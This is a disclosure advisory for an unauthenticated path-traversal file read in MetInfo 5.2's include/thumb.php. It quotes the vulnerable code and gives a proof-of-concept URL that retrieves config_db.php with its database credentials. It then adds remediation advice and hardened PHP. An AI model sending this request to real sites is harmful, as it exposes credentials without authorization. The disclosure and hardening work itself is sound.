Arbitrary file read in the latest MetInfo version
An unauthenticated attacker can read arbitrary files on the server by submitting specially crafted request parameters.
The file include/thumb.php in MetInfo 5.2 (the latest version) serves thumbnails. The thumbnail path it builds, however, is assembled from externally controllable variables, so an attacker can read the contents of arbitrary files:
The key code in include/thumb.php is as follows:
$ext1 = explode("/", $dir); // $dir is passed in externally
$count = count($ext1);
$count1 = $ext1[$count - 1];
$ext2 = explode(".", $count1);
$ext3 = $ext2[1]; // $ext3 is the suffix of the file name taken from $dir
$path1 = $ext2[0]; // $path1 is the file name taken from $dir, without its suffix
$dir1 = '../upload/thumb_src/' . $x . '_' . $y . '/' . $path1 . '.' . $ext3; // $x and $y are also passed in externally, so the whole of $dir1 is attacker-controlled
if (file_exists($dir1)) { // this branch returns the contents of $dir1 to the client
    echo "the file exist :" . $dir1;
    readfile("$dir1");
} else {
    $f = new upfile();
    $imgurls = $f->createthumb($dir, $x, $y);
    readfile($imgurls);
}
?>
An attacker can use a URL such as the following:
include/thumb.php?x=1&y=/.../../config&dir=config_db.php
The code concatenates these values into $dir1 without any check: $dir only contributes the file name (config_db) and suffix (php), while the "..", segments carried in y walk the path out of upload/thumb_src and into the config directory. Because file_exists() succeeds, readfile() returns the source of config/config_db.php, which holds the database credentials, and it can be read in the browser's page source.
The vulnerability requires no login or other privilege: include/thumb.php is reachable by anyone.
Solution:
Treat $dir, $x and $y as untrusted input. Require $x and $y to be plain positive integers, reduce $dir to a bare file name with a whitelisted image extension, and before calling readfile() resolve $dir1 with realpath() and verify that the result still lies inside the upload/thumb_src directory; reject the request otherwise.
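As an added example (not code from MetInfo or from the original post), the following PHP puts the advisory's path construction beside a hardened replacement and runs both on the request parameters shown above. The function names, the $thumbRoot parameter and the image-extension whitelist are assumptions made for illustration.

```php
<?php
// Added example: vulnerable path builder from include/thumb.php (behaviour preserved)
// next to a hardened version. Names and the $thumbRoot parameter are assumptions.

// Vulnerable logic as described in the advisory: every piece of the path is
// taken from the request and nothing is validated.
function vulnerable_thumb_path($dir, $x, $y) {
    $ext1 = explode("/", $dir);
    $count1 = $ext1[count($ext1) - 1];
    $ext2 = explode(".", $count1);
    $ext3 = $ext2[1];
    $path1 = $ext2[0];
    return '../upload/thumb_src/' . $x . '_' . $y . '/' . $path1 . '.' . $ext3;
}

// Hardened version. $thumbRoot is the directory thumbnails may be read from
// (hypothetical parameter; MetInfo itself derives the directory from its install path).
// Returns the resolved path, or null when the request must be rejected.
function safe_thumb_path($dir, $x, $y, $thumbRoot) {
    // 1. Dimensions must be plain positive integers; this alone rejects y=/.../../config.
    if (!ctype_digit((string)$x) || !ctype_digit((string)$y)) {
        return null;
    }
    // 2. Keep only the file name component, then allow a conservative character
    //    set and a whitelist of image extensions (so config_db.php is refused).
    $name = basename(str_replace('\\', '/', (string)$dir));
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpg|jpeg|png|gif)$/i', $name)) {
        return null;
    }
    $candidate = rtrim($thumbRoot, '/') . '/' . $x . '_' . $y . '/' . $name;
    // 3. Resolve symlinks and any remaining ".." and confirm the final path is
    //    still below $thumbRoot. realpath() returns false if the file is missing.
    $root = realpath($thumbRoot);
    $real = realpath($candidate);
    if ($root === false || $real === false) {
        return null;
    }
    if (strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the thumbnail directory
    }
    return $real;
}

// Demonstration with the parameters from the advisory's URL.
$x   = '1';
$y   = '/.../../config';
$dir = 'config_db.php';

echo vulnerable_thumb_path($dir, $x, $y), "\n";
// -> ../upload/thumb_src/1_/.../../config/config_db.php  (leaves upload/thumb_src)

var_dump(safe_thumb_path($dir, $x, $y, __DIR__ . '/upload/thumb_src'));
// -> NULL: rejected at step 1 (non-numeric y) and again at step 2 (.php suffix)
```

Checks 1 and 2 are sufficient to stop this particular request; check 3 is kept because it also defends the code path against symlinks placed inside upload/thumb_src and against any future change that lets more of the path come from the request.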